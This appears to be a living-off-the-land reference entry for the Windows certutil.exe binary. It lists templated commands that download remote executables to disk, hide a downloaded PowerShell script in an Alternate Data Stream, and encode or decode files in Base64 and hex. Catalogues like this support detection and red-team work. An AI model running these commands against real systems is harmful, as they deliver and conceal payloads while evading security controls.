Windows binary used for handling certificates
Download and save executable to disk in the current folder.
certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
Download and save executable to disk in the current folder.
certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
Command to encode a file using Base64
certutil -encode {PATH} {PATH:.base64}
Command to decode a Base64 encoded file.
certutil -decode {PATH:.base64} {PATH}
Command to decode a hexadecimal-encoded file.
certutil -decodehex {PATH:.hex} {PATH}